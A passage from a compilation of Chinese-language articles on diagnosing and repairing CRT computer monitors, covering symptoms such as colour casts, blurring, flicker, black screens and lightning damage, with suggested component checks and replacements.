   应对：这种现象多发生在潮湿的天气，是显示器内部受潮的缘故。要彻底解决此问题，可使用食品包装中的防潮砂用棉线串起来，然后打开显示器的后盖，将防潮砂挂于显像管管颈尾部靠近管座附近。这样，即使是在潮湿的天气里，也不会再出现以上的“毛病”。
   开机黑屏
   现象：电脑开机后，显示器只闻其声不见其画，漆黑一片。要等上几十分钟以上才能出现画面。
   应对：这并不是显示器内部受潮，而是显像管座漏电所致，须更换管座。方法是：拆开后盖可以看到显像管尾的一块小电路板，管座就焊在电路板上。小心拔下这块电路板，再焊下管座，到电子商店买回一个同样的管座，然后将管座焊回到电路板上。
   这时不要急于将电路板装回去，要先找一小块细砂纸，很小心地将显像管尾后凸出的管脚用砂纸擦拭干净。特别是要注意管脚上的氧化层，如果擦得不干净很快就会旧病复发。好了，将电路板装回去就大功告成。
   干扰杂波
   现象：显示器屏幕上总会有挥之不去的干扰杂波或线条，而且音箱中也有令人讨厌的杂音。
   应对：这种现象多半是电源的抗干扰性差所致。如果懒得动手，可以更换一个新的电源。如果有足够的动手能力，也可以试着自己更换电源内滤波电容，这往往都能奏效；如果效果不太明显，可以将开关管一并换下来。
   显示器花屏
   应对：这问题较多是显卡引起的。如果是新换的显卡，则可能是卡的质量不好或不兼容，再有就是还没有安装正确的驱动程序。如果是旧卡而加了显存的话，则有可能是新加进的显存和原来的显存型号参数不一所致。
   两条垂直黑带
   应对：这种现象多发生在较为早期的电脑上，这是由于显卡的显存不够所致。较早的电脑显卡的显存只有１Ｍ，如果将分辨率设得太高，则会出现上述现象。要解决此问题，可往显卡上加装显存，在这类显卡上一般都会留有加显存用的插座。
   显示器黑屏
   应对：黑屏的原因很多。如果是显卡损坏或显示器断线等原因造成没有信号传送到显示器，则显示器的指示灯会不停的闪烁提示没有接收到信号。要是将分辨率设得太高，超过显示器的最大分辨率也会做成黑屏，重者销毁显示器，但现在的显示器都有保护功能，当分辨率超出设定值时会自动保护。另外，硬件冲突也会引起黑屏。


显示器常见故障认识误区及处理(二)

《一键清理系统垃圾》

显示器常见故障认识误区及处理(二)

    六、屏幕上存在干扰故障

    故障现象

    屏幕上总有挥之不去的无规律干扰杂波或细黑线条并伴有“啪啪”杂音。

    故障点的认识误区

    这种故障现象有很多人认为是显示器电源的抗干扰能力太差所致，认为只要换几个电源处的滤波电容就能摆平了。有人甚至认为是开关电源处的开关管出现了问题。这些看法全是错误的。

    故障原因及对策

    其真正的故障原因通常是显像管高压嘴和高压帽之间出现了打火现象。当然，也有很多维修人员能很快地分析这是由于高压嘴处打火造成的，但有很多人的处理方法都不太正确。有的人甚至会把黄油涂到高压嘴上以防止再次发生高压打火。虽说用黄油对显示器来说没有什么危害，但其耐压值可能并不会很高，所以极有可能给其他的维修人员和用户带来被电击的隐患。因此，最好是使用“高压硅脂”进行修复——在添加高压硅脂前要先用无水酒精让高压嘴、帽清洁干净（如有锈还要除锈或换新帽）并用电吹风烘干。

    另外，有时显像管的管座出现打火现象也会出现此故障现象，只是其会同时伴有图像清晰度的时好时坏，这时只要更换正品管座即可搞定！

    七、显示器亮度过亮且无法调暗

    故障点的认识误区

    如果显示器亮度过亮，即使把亮度调为“0”图像还是非常亮时，有人就会认为这是显示器的亮度自动控制电路失控所致，这种看法并不是十分正确——虽然控制电路失控的确会造成这一现象，但通常其并不会失控。

    故障原因及对策

    绝大多数情况下此故障是视放级的供电滤波电容容量减小或开（或虚）焊所致，所以您可先补焊一下试试。如果故障还在，就更换新电容，而且十之八九都是这一故障点。如仍未摆平就要查一下视放供电回路中是否有断路的地方。如以上全部正常时再怀疑亮度自动控制电路（可能性甚微）。

    注：有时存储器故障也会造成这一现象，只不过几率非常低。

    八、显示颜色异常故障

    故障现象

    屏幕上多处有色块或屏幕边缘处颜色异常。

    故障点的认识误区

    有人认为这是显示器长期不断交流电或地磁导致的，但目前绝大多数的显示器并不会因此而出现这个故障——彩显的消磁电路不同于彩电的。

    故障原因及对策

    虽然这是比较典型的显像管磁化故障现象，但该故障现象通常是由于显示器附近放有高磁产品或消磁电路存在故障所致。高磁产品主要是指杂牌劣质音箱，由于正品名牌音箱用的扬声器几乎全部都是无磁的产品，所以只要使用名牌音箱或将杂牌音箱放置距彩显30cm以外就可有效防止并消除故障的出现了。如果不是由于高磁产品的原因，您可手动进行一次消磁（方法参照说明书）。如果在消磁时图像没有一个明显的晃动就说明消磁电路异常，这时最好交付专业人员进行检修。

    注：早期的显示器如果长期不断电的确会导致显像管被磁化，但使用此类显示器的用户已经很少了。

    九、图像扭曲变形

    故障点的认识误区

    有人认为只要设置一下显示器的设置就行了。的确，如果这一现象是人为造成的话只要调一下就行了，但这一情况几乎是不会出现——除非是菜鸟中的菜鸟^_^。

    故障原因及对策

    其常见故障点通常是行或场的某校正电路出现了问题（比如S校正电容等），由于维修起来要有一定的专业知识，所以笔者建议您交付家电维修部门进行维修。当然，如果故障是在您对显示器进行了什么操作后出现的话，那么您可先参照说明书进行一些调试校正工作试试，只要您详细看过说明书通常都能搞定！:)

    十、对比度偏低故障

    故障现象

    所谓对比度低就是层次感下降了，而且色彩也不如以前艳丽了。

    故障点的认识误区

    很多人在调整对比度无效后就认为是对比度控制电路出现了故障或显像管已老化了，这些看法并不十分正确。

    故障原因及对策

    多数情况下这是由于显示屏上的灰尘太多了造成的。当然，我们也不能排除对比度控制电路部分出了问题，但其可能性是非常小的，而且业余人员几乎是无法进行维修的。所以，在对显示屏进行清洗无效后最好找专业电器维修人员进行维修。

    十一、黑屏故障

    故障现象

    开机后，主机对显示器没有任何报错指示，而且显示器的状态指示灯显示正常，电源开关也正常，但就是没有图像（呈黑屏），但有时拍打一下彩显机壳或偶尔开机时其又能正常显示，不过使用一段时间后情况越来越严重。

    故障点的认识误区

    这一故障看上去明显是电路中有什么地方接触不良所至，但通常很多人并没有头绪是什么地方造成的。

    故障原因及对策

    这样您可先看一下灯丝供电回路中是否有虚焊的元件或焊点，通常这就是造成此类故障的元凶。

    当然，有时主机由于主机的原因也会造成黑屏现象，但无论您怎么拍打彩显机壳也不会有所好转，所以有条件的话可将显示器接到别一台确定无故障主机上试试看。另外，目前有很多显示器在拔掉连在显卡上的信号线后就会出现自检显示功能，如果显示正常就说明显示器基本无故障，故障点在信号线或显卡上，这样一来就能更方便地找到故障点了。

    注：鉴于其他黑屏现象的故障原因专业性比较强，故不做介绍。

    十二、无法开机故障

    故障现象

    1.彩显在通电后没有任何反映，就连指示灯也不亮。

    2.一开机什么图像也没见到就保护性关机了。

    故障点的认识误区

    有人见到此类故障会说这只是小故障，换个保险管就OK了；有人说这是显卡的驱动程序坏了，这些看法并不正确。

    故障原因及对策

    由于彩显的保险管是延时保险管——即允许瞬间流过远大于额定电流的大电流，所以说通常都是存在短路性故障才会烧毁此保险管。这时，您就是换上新保险管也会再次熔断的，当然，如果保险管看上去并无异常，但就是不通的话，就可能是老化损坏，这时换上新保险管就能正常工作了，不过这种情况很少遇到。

    至于驱动程序之说更是谬论了——在未进入WINDOWS之前是不用这种驱动程序的。对于第1种故障现象来说，诸如电源线、电源插座和插头有时会成为"无凶"，所以您要先把简单的可能性排除，如果排除后仍为黑屏的话，你就要找专业维修人员进行维修了。注：如果是在进入系统时变成黑屏的就要考虚显卡驱动了。

    对于第2种故障现象您可让彩显进入自检显示或干脆接到另一台主机上试试，如果还不能点亮的话就证明电路存在故障了，这种故障笔者建议您交付专业人员进行检修；如果能点亮的话就说明是主机出了问题，诸如显卡和主板及CPU等，您可用替换法做相应的检查。

    十三、系统无法识别显示器

    故障现象

    有时进入WINDOWS后系统报告找到了新硬件并自动安装驱动程序，到设备管理器中一看，原来是监视器变成了无法识别的监视器了。

    故障点的认识误区

    有人认为这是显示器出了硬件故障或某元件性能不良所致，有人认为是显卡出了硬件故障或显卡驱动程序损坏所致，有人认为是显示器和显卡相连的数据线出现了问题，有人认为是VGA插座出了问题，以上这些看法均是误区。

    故障原因及对策

    这一故障多发生于即插即用型显示器上，而且多是长时间使用并重启后出现该故障。原因是未安装显示器厂家的专用显示器驱动程序所致，您只要到厂家的网站下载相应的显示器驱动程序并安装上即可搞定！:)

    结语

    在笔者以前的维修过程，以上这些故障的认识也存在过误区，也曾为此而走过不少的弯路。但经笔者反复实践推敲后，最终还是发现了真正的故障点，而且从众多的故障中总结出了一个规律——

    真正的故障点往往并不是深藏不露的元件（原因），通常都是一些非常简单的地方存在问题。但在维修时多数人都会犯“经验主义”和“教条主义”的错误，经常会把故障点想得很复杂，而且很少有人有“刨根问底”的习惯，所以常常会造成大走弯路的情况。当然，经验还是必不可少，而且非常重要的，只是我们还要学会具体问题具体分析的本事（思路）才行^_^。好了，不多说了，希望本文能让您有一些维修思路上的感悟。Good luck!


显示器常见故障认识误区及处理(一)

《一键清理系统垃圾》

显示器常见故障认识误区及处理(一)

    在网上各个大大小小电脑类论坛上，经常看到诸如“显示器故障！急救……”之类主题的贴子。虽说现在很多人都有小故障自己处理的好习惯，但无论是业余爱好者，还是专业维修人员，在对一些显示器常见故障“发病”原因的认识上多多少少地存在着误区。这些误区通常会成为维修中的“拦路虎”或造成“后遗症”。

    故笔者特挑选出13种最具代表性的故障点认识误区，来进行一下说明。希望本文能让大家重新认识一下显示器常见故障的真正“发病”原因和正确的处理办法，从而能少走些弯路^_^。（注：仅指常见故障原因而不包括疑难杂症）

    一、屏幕偏色故障

    故障现象

    1.在刚开机时整个屏幕偏红（部分彩显会带有回扫线），但一眨眼的功夫就正常了。

    2.在使用中偶尔出现屏幕发红现象，但也是一眨眼就正常了。

    3.整个屏幕呈白红且带有很重的回扫线并马上保护性关机（或黑屏且无法再开机了）。

    故障点的认识误区

    对于这一类故障很多人都说是显卡有硬件故障，也有人说是显像管报废了，还有人说是显卡的驱动程序损坏所致。其实，这几种看法均是错误的。

    故障原因及对策

    这种故障并不是无法修复的——轻微的可用电击，严重的可重绕灯丝供电绕组，而且有时某一色电子枪的视放供电电阻虚焊或呈断路性损坏或阻值变大也会造成此类故障现象。另外，有一些机型只是有一定的轻微极间漏电，通常不用维修，只是在开机时有瞬间偏色，几秒钟即可正常（第1种故障现象）。

    对于碰极（有时仅为漏电）故障您只能交给专业维修人员进行维修，其特征是通常会造成保护性关机。

    对于无规律性偏色故障通常只要把相关电子枪的视放供电电阻及周边元件补焊一下就能搞定。

    对于供电电阻呈断路损坏造成的故障现象和碰极一样为满屏带回扫线且某一色极亮，但其并不会导致保护性关机，解决方法很简单——换同阻值的新电阻即可！当然，如果是阻值变大了，也要进行换新处理。

    在潮湿的季节我们还要把显像管座管氧化这个原因考虑进去。虽然因此而造成的偏色故障不多，但笔者的确遇到过，后经分析可能是设计或元件的质量不太好所致:(。

    注：不知是设计习惯还是什么其他原因，偏色故障偏红的几率最大，其次是偏蓝，最后是偏绿:)。

    另外，还有一个比较容易让人走弯路的故障原因——屏幕灰尘过多导致屏幕显示白色时偏红！此类故障多发生在色温偏暖的显示器中（很多显示器能自行设置色温）。所以说，遇到白色（和相近颜色）偏红故障时，您最好是先清洁一下显示屏后再进行其他的检查。如果故障消失就意味着你不会因此而走"倒霉"的弯路了:)。 当然，某些机型的亮度值设置得过低也会造成这一"故障"现象。

    注：如果上面的所有方法均无效且显示器使用的年头已远远超过5年了，那么我们就可视为电子枪老化导致的偏色故障。

    二、开机图象模糊故障

    故障现象

    1.开机时图像比较模糊，虽然使用一段时间后就逐渐正常了，但在关机一段时间后再开机时故障又会再次出现，而且是一天不如一天，故障越来越严重。

    2.开机后图像一直模糊，使用很长时间后也不见好转。

    故障点的认识误区

    有的半专业人士看到这两种故障就说是显像管寿命到了，有的维修人员看到了会说调一下对比度或高压包上的聚焦极电位器和加速极电位器就会好了，还有人说是显卡的硬件故障或显卡驱动损坏所致。这几种故障点的判断都是错误的——显像管老化和对比度下降并不会造成此类故障现象。至于调整聚集极和加速极电位器就更不正确了，这样做是治标不治本，而且其很难调到令人满意的程度，最让人头痛的是用不了多久故障还会复发，甚至会加速显像管老化。

    故障原因及对策

    通常都是使用2年以上的彩显才会出现这种故障，真正的故障原因多数情况下是显像管管座受潮氧化所致，只要更换一下正品新管座就能排除故障。但有人说在插上新管座之前要先找一小块砂纸将显象管尾后凸出的管脚打磨干净，目的是除掉氧化层，这种做法无异于画蛇添足。在笔者更换过管座的显像管中，有一些的确在管脚上有一些氧化物，但这些氧化物是原管座内遗漏到管脚上的，只要用小毛刷一扫就能清除。至今笔者并未见到过管脚被氧化的情况，但由于用力过大而使管脚处漏气而损坏显像管的情况倒是遇到过几例，所以大家不要用砂纸进行打磨，以免出现“死亡”性损坏！

    如果更换管座不见效就要更换高压包。不过，此工作笔者建议您最好是找专业人员进行！另外，有些机型的视放部分电路比较特殊，有时发生故障后也会造成图象模糊，但这时通常亮度和行、场幅度也都有异常。对于此类故障点笔者建议您交付专业人员处理！

    如果彩显并非名牌产品且使用年头已非常长了，那么笔者建议您找专业电器维修部门进行更换管座的工作，以免出现管颈漏气等意外后自负责任:)！

    三、使用中图象模糊故障

    故障现象

    1.在刚开机时图像清晰，但随着使用时间的延长而越来越模糊

    2.在使用中图像偶尔变模糊，但很快就可恢复正常，不过使用几天或几个月后就越来越严重、越频繁。

    故障点的认识误区

    有人认为此类故障是显示器行电路部分的问题——可能是行管、逆程二极管、逆程电容等元件的热稳定性能不好或有虚焊所致。这些认识可以说是完全错误的，因为这些元件没有一个能对图像的清晰与否造成影响。

    故障原因及对策

    第1类故障现象的真正故障点通常是由于高压包的聚焦极旋钮老化，您可先更换一个高压包试试。当然，如果显示器使用的年头已经超过6年的话，那我们也要把显像管老化的可能性考虑进去。

    另外，有一次笔者为一位教数字的教授修的一台此故障现象的机子竟然是显像管的管座和视放板的大面积负极铜箔存在漏电现象所致（后经分析像是设计上存在问题），所以有时陷入维修困境后可更换一个正品管座试试。

    对于第2类故障现象来说，通常是显像管管座质量不高所致，您可通过更换新品来解决问题。

    四、屏幕闪烁故障

    故障现象

    1.屏幕边缘有闪烁现象。

    2.整个屏幕有闪烁现象。

    3.屏幕的某一角有闪烁现象。

    故障点的认识误区

    很多人认为这是市电的电源电压不够或不稳造成的，有些“高手”甚至会说是由于一些带有电子镇流器的灯具或机电类电器带给彩显电源的干扰，有人说是显卡发生了硬件故障所致。其实这些看法都是错误的，因为显示器对电压的要求并不是十分的严格——目前绝大多数彩显都能在100V～240V的电源电压下正常工作。当然，如果电压过低或电压波动实在太大的话就另当别认论了。不过，近两年以来，国家实施全国农村电网改造后现已初见成效，已从根本上解决了以往农村电压不稳定、电压低的问题，而在城市这些问题通常更是不存在了，所以这些因素已经不再重要了。至于其他电器会造成干扰就更不可能了，毕竟彩显使用的不是互感式稳压电源，况且其他电器即使带来干扰也不会是屏幕闪烁！

    故障原因及对策

    造成前两类故障现象的真正故障原因，通常是由于行电路部分元件虚焊或电源处的+300V滤波电容容量减小所致。而后者的可能性并不高——只有在个别机型中且其较严重失容时才会因此而出现人眼能辨别的闪烁。

    另外，有些机型的视放供电部分的电路比较特殊，有时该部分的某一元件虚焊也会造成此故障现象。当然，如果您把显示器的分辨率和刷新率设置得偏高或过低的话也可能造成此类故障，所以您可把分辨率和刷新率设置成中间值试试（注：长期工作于超频状态会使某些元件老化而出现此故障，而且故障点比较难找）。还有就是显卡或显示器的驱动程序存在BUG，所以您要先更新一下驱动程序试试。如果以上处理均无效，您可重点检查一下高压包产生的加速极电压和高压是否正常，因为有时这两个电压异常也会导致此类现象。

    注：如果打开电视机也有闪烁的话，那就要先查一下市电电源是否存在问题了——如容量太小或电压波动过大等（最好找电工检查）。

    总的来说，此类故障的维修要求您一定要有一定的动手能力和专业知识，所以笔者建议您如果在排除了简单的故障原因后仍未修复的话就交付电器维修部门进行处理。

    有时一些带磁物品（如一些低档电源盒或ADSL外猫电源等）放在显示器附近会造成屏幕的某一个角闪烁，所以遇到此现象要先试着清除显示器周围的物品看看，通常问题都能得到解决。

    五、屏幕上有水波纹

    故障点的认识误区

    这是一个老生常谈的问题^_^，但笔者还是要再说一说，因为有些人认为只有劣质产品或硬件上存在故障的显示器才会出现水波纹。其实不然，因为几乎所有CRT显示器都有水波纹，只是有轻有重罢了。通常，只要显示器在800×600以上的分辨率下没有水波纹，而只是在640×480的分辨率下有水波纹就属于正常（屏幕全白时会比较明显），说明其并无硬件故障。

    故障原因及对策

    如果在800×600以上的分辨率下仍有水波纹的话就要注意了。如果未过保修期的话，你可找相关部门去理论；如果已过了保修期的话，您可先更换一个+300V的电容试试，如果无效就要交付专业维修部门了。

    另外，有人说此类故障是显卡的质量有问题（如偷工减料等），依笔者分析这个可能性并不大，而且笔者也从未遇到过因此而造成的故障，所以不敢枉下定论，但在维修时您最好不要把它也当做一个重要“嫌疑犯”，以免走弯路:)。


显示器出现光栅之谜

《一键清理系统垃圾》

显示器出现光栅之谜

   我的显示器是三星的500b，我将其刷新率设为85Hz，一直正常使用。可是近来开机时，不知为何在显示器上总会出现几条光栅，并不停地上下滚动。
   我首先想到的是不是我把显示器的刷新率设得太高呢？但是我使用的是800×600的分辨率，500b正常工作在85Hz下是不应该存在问题的。把刷新率降低为75Hz再次开机，显示器问题依旧。把显示器和显卡的驱动程序各重装了一次，结果问题还是没有解决。偶然瞥见了显示器旁的一对木制音箱，该不会是它在捣鬼吧？把它关掉让其远离我的显示器，果然，再次开机时屏幕上的光栅不见了。原来是音箱的磁场对显示器产生影响，导致了光栅的出现。
   原以为这样就解决了问题，可没过多久，显示器又出现光栅了，想来这次一定是显示器本身的原故了，便与友人一起把我的显示器送到电脑公司去检修。可一到了那儿，显示器却安然无恙，无任何不良反应，害得我白跑了一趟。回到家后便自己动手拆开主机，检查后这才发现，原来我的TNT显卡上一个小电容出现虚焊，我小心地把它重新焊好，开机后一切正常。后来听一位专家说，那一个小电容就是把它拆掉也不影响正常使用。
   近日同事家的计算机也出现了问题，故障又是显示器出现了光栅浮动，但开机一段时间后又会自动消除。同事的显示器是飞利浦107E。因为有了上次的经验，我便提出动手给同事做义务维修。拆开机箱检查没有发现什么问题，用替换法一一尝试，发现所有硬件都工作正常。该不会是电源产生的电气干扰吧，正想一并拆下时，同事自己说出了自己的怀疑：她前些时候刚买了一根64MB的现代内存条，会不会……拆下这根内存开机，果然一切正常，显示器再也没有出现问题。
   通过这两起显示器故障，使我明白了一个道理：一个小小的问题有时可能由不同硬件所造成，在检修时，要先分析再动手，这样会少走好多弯路的。


显示器的常见故障

《一键清理系统垃圾》

显示器的常见故障

    一直以来，显示器作为电脑配件中比较重要的配件始终是消费者选购过程中较为重视的部件。而每当显示器出现故障时，消费者则是显得一筹莫展，一时之间束手无策。其实，在对显示器的工作原理进行初步了解之后，消费者自己也能进行简易的维修和保养工作，即使故障非常严重，也可以及早进行维修，从而延长显示器的使用寿命。

    CRT显示器的故障

    1．刚开机字符模糊，然后渐渐清楚，是正常现象吗？

    首先告诉大家，如果您的显示器也出现这个问题，那您可要为你的显示器准备“后事”了。因为这个情况是显示器老化的前兆。

    从原理上来说：显管内的阴极管电子枪必须加热之后才能打出电子束，可是当阴极管开始老化的时候，加热的过程变慢了，所以在刚开机的时候，没有达到标准温度的阴极管，无法射出足够的电子束，因此我们这时看见的画面会由于没有足够电子束轰击荧光屏而不清晰，而长时间使用之后，温度达到标准的要求，足量电子束轰击荧光粉使显示器变得清晰起来，这个情况一般发生在购买显示器多年之后，已经没有维修的必要了，您可以另行选购显示器。如果是新显示器出现这样的问题，说明该机已有老化征兆，有可能是翻新显像管，建议立刻退货。

    2．先清楚后模糊，为什么？

    从原理分析，造成这种现象的原因主要在于聚焦电路，也有可能是散热不良造成的。首先是由于聚焦电路设计有问题，造成长时间使用之后无法保证其正常工作，造成图像模糊；其次呢，由于散热不良，造成行管太热，形成输出功率损耗，接着影响到高压的输出和加速级电压输出不够，从而影响到聚焦电路的正常工作。其实还是聚焦电路的问题。

    解决方法：打开显示器的后盖，里面有一个可以调整高压的旋钮。不过这种方案只是在短期内有效，长时间让显示器在调整高压的情况下工作会加速显示器的老化，时间长了仍然会产生聚焦不良的情况。如果这台显示器已经服役多年，可以让其发挥生命中最后的热量；但是，如果是新近购买的显示器，就一定要尽快更换。

    3．显示器缺色怎么办？

    由于显示器靠解码电路来分离色彩，出现缺色问题，基本故障确定在这个电路上，更换电路即可解决。不过一些隐性问题也可能造成缺色，这个就很不好区分和维修了，笔者的显示器就因为显示器信号线有问题导致缺色，导致修理过程异常复杂，并走了许多弯路。

    解决办法：由于缺色涉及到电路板的更换和维修，甚至只是更换部分电容电阻等元件，出现这样的问题应立刻到专业的显示器维修中心去测试，如果是新显示器，则应立刻更换。


显示器电源雷击故障的检修

《一键清理系统垃圾》

显示器电源雷击故障的检修

    故障机型：金长城C－I5271型显示器；
    故障原因：雷击；
    故障现象：无显示。用户反映，该机遭到雷击时，发出“嘭”的一声响。
    分析与检修：打开机壳发现电源保险丝（F901/3.15A）已经烧断，且内部发黑，说明电源有严重的短路故障。测电源调整管漏极（D）对地电阻为0Ω，栅极（G）对地电阻也为0Ω，说明电源调整管已被完全击穿。将电源调整管（IRFBC40）从电路上拆下来，用三用表（MF－47型）×1kΩ挡位测D、S、G三个电极之间的阻值发现，已经完全短路。分别用×1kΩ、×100Ω挡位测D、S、G三个电极所连接电路的对地电阻值见^50030401a^表一，根据以往的维修经验，G极正反向电阻明显异常。
    检查电源调整管所连接电路（^50030401e^1），漏极（D）接电源脉冲变压器，源极（S）通过0.2Ω电阻到地，而调整管栅极（G）则通过二极管D910（BYT42－M）到地。将二极管D910从电路上拆下一个引脚，测正反向电阻均为5Ω，说明D910已被击穿。
    本机的电源由电流型脉宽调制电路UC3842B和MOS管（电源调整管）IRFBC40组成，当电源调整管击穿后，一般情况下UC3842B也随即损坏。检查UC3842B各个引脚对地电阻没有发现明显异常现象。检查UC3842B脱机状态下的各个引脚间直流电阻及对UC3842B的检查，均符合表二中正常数值（正常阻值参见^50030401b^表二，^50030401c^表三是UC3842B的典型电压参数值）。检查电源电路中其他部分也没有发现短路现象。
    更换电源调整管、二极管D910、保险丝F901。为防止电源的负载短路（特别是行扫描电路短路），将供行扫描电路的＋80V输出端断开，从电源输出端接一个40W/220V的灯泡，开机，显示器电源指示灯亮，说明电源短路故障被排除。测场扫描电路供电电源＋50V、数字电路＋15V、控制电路＋25V、视频放大电路＋80V均正常。
    分别检测行扫描电路、显像管电路等，没有发现明显的开路或短路故障后，取下灯泡，将行扫描电路的＋80V接上，再次开机，显示器电源指示灯亮，说明行扫描电路或行输出电路正常。测行输出管集电极＋80V正常，再分别测＋50V、＋15V、＋25V、＋80V均正常。开启主机，加入信号，显示器显示。通过主机改变显示刷新率，更改显示模式以及对屏幕的亮度、对比度等项进行调整均正常，连续开机两小时没有出现问题，说明显示器的故障已被排除。
    小结：1.显示器遭到雷击，往往会造成电路的大面积损坏，尤其是电源电路、行扫描、场扫描电路以及与主机的接口电路等。本显示器遭到雷击时，有“嘭”的一声响，大致说明电源有严重的短路故障，其检修重点应放到电源电路。由于雷击显示器没有规律可循，更不知道故障可能出现的部分电路，所以应建立正确分析判断故障范围的思路。由于在一般显示器的电源电路中，保护电路较为齐全，当电源的负载（扫描电路等）电路出现短路或开路时，都能得到良好的保护，电源电路只会停止工作，无输出电压，电源的供电保险丝不会烧毁。如果发现电源保险丝烧毁，故障应在电源电路本身。从本思路出发，首先对电源电路进行检查，从而可快速检查出故障所在的部位。
    2.当雷电瞬间进入本机后，其强大的脉冲电流将在电源脉冲变压器上产生瞬间强反向感应脉冲电压，由于此脉冲电压远远大于电源调整管的反向击穿电压，因而造成电源调整管的反向击穿，使电源保险丝烧毁。
    3.由于显示器的电源电路为开关电源，电源的负载是不能开路的，检查判断电源电路和扫描电路的故障时，应将电源输出端（高电压输出端）接一个假负载，一般采用灯泡，灯泡的大小应根据显示器电源输出电压或电源负载的大小来确定，14英寸～17英寸显示器一般使用40W～60W/220V灯泡。
    4.一般情况下，用户在设置显示器的电源开启方式时，是与系统同步（Win95/98），即是说当关闭主机电源时，显示器的电源也将被关掉，但此时是软关机，虽然电源关闭了，电源的开关并没有真正断开，仍保持闭合状态，因而给雷电或其他强脉冲干扰的窜入提供了条件。建议养成良好的习惯：每次关机时，都将主机、显示器的电源开关断开。如果习惯于使用软关机，应将总电源关闭，可以避免很多不必要的麻烦。
    5.由于IRFBC40损坏后较难买到，可以用IRFBC40A、IRFBC80A直接代换，也可以用6N60直接代换。IRFBC40的性能参数参见^50030401d^表四。


显示器黑屏故障分析

《一键清理系统垃圾》

显示器黑屏故障分析

    计算机显示器出现黑屏是用户在使用计算机中经常遇到的问题。其实，只要稍对计算机硬件中主板、CPU、内存、显示卡等几大部件有一定的了解，非元器件的损坏的简单故障完全可以自已动手排除。出现这种情况，你可以按照以下的维修步骤和方法进行分析和简单的维修：
    一、检查主机电源是否工作　电源风扇是否转动？用手移到主机机箱背部的开关电源的出风口，感觉有风吹出则电源正常，无风则是电源故障；主机电源开关开启瞬间键盘的三个指示灯（NumLock、CapsLock、ScrollLock）是否闪亮一下？是，则电源正常；主机面板电源指示灯、硬盘指示灯是否亮？亮，则电源正常。因为电源不正常或主板不加电，显示器没有收到数据信号，显然不会显示。
    二、检查显示器是否加电　显示器的电源开关是否已经开启？显示器的电源指示灯是否亮？显示器的亮度电位器是否关到最小？显示器的高压电路是否正常？用手移动到显示器屏幕是否有“咝咝”声音、手背汗毛是否竖立?
    三、检查显示卡与显示器信号线接触是否良好　可以拔下插头检查一下，D形插口中是否有弯曲、断针、有大量污垢，这是许多用户经常遇到的问题。在连接D形插口时，由于用力不均匀，或忘记拧紧插口固定螺丝，使插口接触不良，或因安装方法不当用力过大使D形插口内断针或弯曲，以致接触不良等。
    四、打开机箱检查显示卡是否安装正确，与主板插槽是否接触良好　显示卡或插槽是否因使用时间太长而积尘太多，以至造成接触不良？显示卡上的芯片是否有烧焦、开裂的痕迹?因显示卡导致黑屏时，计算机开机自检时会有一短四长的“嘀嘀”声提示。安装显示卡时，要用手握住显示卡上半部分，均匀用力插入槽中，使显示卡的固定螺丝口与主机箱的螺丝口吻合，未插入时不要强行固定，以免造成显卡扭曲。如果确认安装正确，可以取下显示卡用酒精棉球擦一下插脚或者换一个插槽安装。如果还不行，换一块好的显卡试一下。
    五、检查其他的板卡（包括声卡、解压卡、视频捕捉卡）与主板的插槽接触是否良好　注意检查硬盘的数据线、电源线接法是否正确？更换其他板卡的插槽，清洁插脚。这一点许多人往往容易忽视。一般认为，计算机黑屏是显示器部分出问题，与其他设备无关。实际上，因声卡等设备的安装不正确，导致系统初始化难以完成，特别是硬盘的数据线、电源线插错，也容易造成无显示的故障。
    六、检查内存条与主板的接触是否良好，内存条的质量是否过硬　把内存条重新插拔一次，或者更换新的内存条。如果内存条出现问题，计算机在启动时，会有连续四声的“嘀嘀”声。
    七、检查CPU与主板的接触是否良好　因搬动或其他因素，使CPU与Slot 1插口或Socket 7插座接触不良。用手按一下CPU或取下CPU重新安装。由于CPU是主机的发热大件，Socket 7型有可能造成主板弯曲、变形，可在CPU插座主板底层垫平主板。
    八、检查主板的总线频率、系统频率、DIMM跳线是否正确　对照主板说明书，逐一检查各个跳线，顺序为“系统频率跳线——CPU主频跳线——DIMM频率跳线”，设置CPU电压跳线时要小心，不应设得太高。这一步对于一些组装机或喜欢超频的用户有很大用处。
    九、检查参数设置　检查CMOS参数设置是否正确，系统软件设置是否正确。检查显卡与主板的兼容性是否良好。最好查一下资料进行设置。
    十、检查环境因素是否正常　是否电压不稳定，或温度过高等，除了按上述步骤进行检查外，还可以根据计算机的工作状况来快速定位，如在开启主机电源后，可听见计算机自检完成，如果硬盘指示灯不停地闪烁，则应在第二步至第四步检查。
    上述的检查方法基于显示器本身无电气故障，即开启主机电源后显示器的电源指示灯不亮。若以上步骤均逐一检查，显示器仍不显示，则很可能属于电路故障，应请专业人员维修。


显示器黑屏故障排除

《一键清理系统垃圾》

显示器黑屏故障排除

   故障现象：一台586兼容机，配置为Intel 430VX主板、Pentium 100MHz CPU、16MB内存、Trident 9680显卡、Seagate 1080MB硬盘。开机后出现两种不同情况：1屏幕无显示，出现“死机”现象，敲任何键均无反应(显示器，主机电源指示灯亮)，亦不能听到任何自检声和报警声。2有时能正常工作，用KV300最新版清杀病毒，发现硬盘无毒，但若关机或者热启动，即出现第1种情况。有时今天正常，明天即不能工作。
   故障分析与处理：
   1.因屏幕无显示，故首先考虑是否显示器出现故障?其次考虑显示卡是否出现故障?找来一台同型号显示器替换，故障依旧，说明不是显示器故障。打开机箱，更换一块好的显示卡，开机，显示正常。
   2.关机，重新启动，故障重又出现。难道是PCI扩展槽接触不良?遂将这块好的显示卡换到另一扩展槽，故障依旧。再换一个插槽，还是无反应。难道是PCI扩展槽的电路虚焊或脱焊?卸下主板，仔细检查，并用万用表检测，未发现故障。
   3.找来一块好的ISA总线显示卡，插入ISA扩展槽。打开机器，故障消失。重新热启动，屏幕又无显示。到此，初步排除故障不在显示器、显示卡和扩展槽。
   4.拔下显示卡，重新开机，发现主机自检时，未听到显示卡故障报警声。故怀疑与内存有关。
   5.拔下内存条，调换顺序，重新安装，首先安装原第3和第4条内存条，然后再重新开机，OK!屏幕显示内存为8M(每条为4M)，关机，再安装原第1和第2条内存条，开机，显示为16M，一切OK!故障消失。
   6.找回原来的显示器和显示卡，并将显示卡插在原来的扩展槽上，开机，一切OK!
   从故障发生的情况来看，是因为数据在装入内存(主要是RAM的前64KB)时出现了错误引起的。从内存条来分析，是由于第一块内存条个别芯片不稳定或是质量不良，在微机启动寻址时出现了错误。因此，微机显示故障的出现，不仅与显示器、显示卡等有关，有时更多是与内存条的质量有关。在出现故障时，我们不妨多动动脑筋。


显示器模糊的原因与处理

《一键清理系统垃圾》

显示器模糊的原因与处理

